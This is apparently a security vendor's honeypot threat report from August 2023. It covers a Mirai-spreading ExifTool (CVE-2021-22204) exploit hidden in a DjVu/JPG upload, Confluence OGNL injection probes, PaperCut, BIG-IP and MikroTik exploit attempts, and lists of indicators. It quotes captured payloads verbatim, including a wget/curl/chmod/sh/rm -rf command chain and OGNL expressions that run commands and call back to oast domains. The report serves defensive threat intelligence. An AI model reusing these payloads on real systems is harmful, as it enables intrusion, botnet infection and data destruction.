CERTHoneypots

Our selection of alerts on honeypots: report 16 – August 2023

After a summer break, we are back with observations on our honeypots to provide you with information on what is going on the Internet. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adjust the cybersecurity posture.

The following report focuses on logs from the past month.

Check out our previous report here.

Mirai-based variants downloaded in JPG files

In August 2023, TEHTRIS monitored 11 IP addresses sending POST requests with a jpg file hiding commands aiming at downloading the Mirai botnet. The requests were all aiming at a Singaporean honeypot.

  • Timeline

We observed a constant flow of incoming requests from July 31st until August 11th, then a decrease followed by a surge on August 15th.

Timeline of POST requests containing a jpeg file

The commandlines seem to be hidden in the jpg metadata and would likely be executed upon opening the image. 

  • Characteristics of the requests

The URL is “/$” followed by 4 digits.

URLCount
/$326197.15%
/$66842.478%
/$63410.248%
/$53410.124%

The RawData section contains the interesting part :

'--0002cdabf64440e48c7a0192d8bef98e\r\nContent-Type: image/jpeg\r\nContent-Disposition: form-data; name="file"; filename="lol.jpg"\r\nContent-Length: 1251\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright "\\\n" . qx{cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://195.58.39.193/trc.sh; curl -O <URL>; chmod 777 <filename>; sh <filename>;; rm -rf *;}. \\\n" b ") ) \n} . \\\n" b ") ) \n\r\n--0002cdabf64440e48c7a0192d8bef98e--\r\n'

This is very likely an attempt to exploit CVE-2021-22204 (CVSS3 7.8) and / or CVE-2021-22205 (CVSS3 10), a vulnerability in the ExifTool which can lead to arbitrary code execution due to improper neutralization of userdata in the DjVu file format. ExifTool is a opensource program for reading, writing and manipulating image metadata, used as a component in GitLab among others. This can allow an attacker to execute commands hidden in the metadata.

  • Downloaded files

Among the hundreds of requests, 6 unique URLs are found in the rawData, 4 of them downloading Mirai-based variants:

The other two URLs had never been submitted to VirusTotal prior to our investigation.

  • IoCs
204.10.194[.]6874.50.95[.]126
84.54.51[.]20494.156.102[.]66
193.34.212[.]110http[:]//195.58.39[.]193/trc.sh
190.211.252[.]50http[:]//45.41.241[.]48/x86_64
45.128.232[.]83http[:]//87.121.113[.]147/bins/sshdx86
66.118.232[.]225http[:]//94.156.102[.]166/x-8.6.blaze
193.177.182[.]23http[:]//45.41.241[.]48/x86_64
45.95.146[.]79http[:]//104.234.220[.]161/sora.x86
64.112.72[.]102 

Swedish IP address targeting Lithuanian honeypots

The same Swedish IP address 77.91.87[.]196 (AS 210644 AEZA GROUP Ltd) has been attempting to find vulnerabilities on our Lithuanian honeypots on August 6th and 9th. The IP address is only flagged malicious by 3 vendors on VirusTotal, none on other databases, and has started to be gradually reported in the past week by a dozen sources to AbuseIPDB. Here is a recap of the exploit attempts:

  • Confluence OGNL injection vulnerability (CVE-2022-26134)

Incoming GET requests from Swedish IP address 77.91.87[.]196 probed our Lithuanian honeypots to find Confluence servers vulnerable to the OGNL injection vulnerability tracked as CVE-2022-26134 (CVSS3 9.8). OGNL is a popular expression language for Java. OGNL injection can lead to remote code execution.

URL :

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun")}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site")}/

The attacker sends a DNS request to oast.site or oast.fun to check if the domain is accessible, and will probably use a second command to download a malicious payload. For instance, at the time of writing, cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun resolves to Singaporean IP address 206.189.156[.]69, which is known for communicating with malicious files such as trojans.

The vulnerability has been fixed in later versions.

  • PaperCut Authentication Bypass  (CVE-2023-27350)

CVE-2023-27350 (CVSS3 9.8) is a vulnerability that has been disclosed by PaperCut on March 2023 and which enables an unauthenticated user to execute malicious code remotely without credentials. According to an advisory by CISA, the vulnerability was exploited in the wild – including by the Bl00dy ransomware gang in a campaign against the Education sector.

GET request: /app?service=page/SetupCompleted

A patch has since been released.

  • BIG-IP iControl REST Authentication Bypass (CVE-2022-1388)

CVE-2022-1388 (CVSS3 9.8) is a vulnerability affecting BIG-IP systems which allows an unauthenticated attacker to execute arbitrary system commands, create or delete files, or disable services.

POST request : /mgmt/tm/util/bash

  •  BIG-IP/BIG-IQ iControl REST RCE Attempt (CVE-2021-22986)

Similar packets than those detailed in our Report 15 are detected.

  • IoCs

77.91.87[.]196

206.189.156[.]69

cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun

cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site

Mikrotik Winbox RCE Attempt (CVE-2018-14847)

Between August 8th and 14th, we monitored attempts to exploit CVE-2018-14847 (CVSS3 9.1) coming from 3 IP addresses :

IP sourceCountryAS
5.104.80[.]129DKAS 14199 ( Contabo Asia Private Limited )
51.158.24[.]19FRAS 12876 ( Scaleway S.a.s. )
185.38.148[.]134GBAS 25369 ( Hydra Communications Ltd )

CVE-2018-14847 (CVSS3 9.1) is a vulnerability affecting MikroTik RouterOS allowing an unauthenticated remote attacker to read and write arbitrary files due to a directory traversal vulnerability in the WinBox interface. It was fixed in 2018 and added to CISA’s Known Exploited Vulnerability catalog in Decembre 2021. Well, apparently, it is still exploited in the wild – although it is the first time we detected this exploit attempt in 2023.

Packets were sent over on TCP/80, TCP/445, TCP/51801 and TCP/52802.

The targets were exclusively European honeypots, with Lithuania, the Czeck Republic and the United Kingdom ahead:

Country repartition of targeted honeypots
  • IoCs

5.104.80[.]129

51.158.24[.]19

185.38.148[.]134

Russian IP addresses probing for vulnerable Asus routers

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

    WordPress vulnerability

    Want to learn more on this subject?

    More insights on this research issued from the alerts on our worldwide honeypots network.

    Subscribe to our bi-monthly threat intelligence newsletter


      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.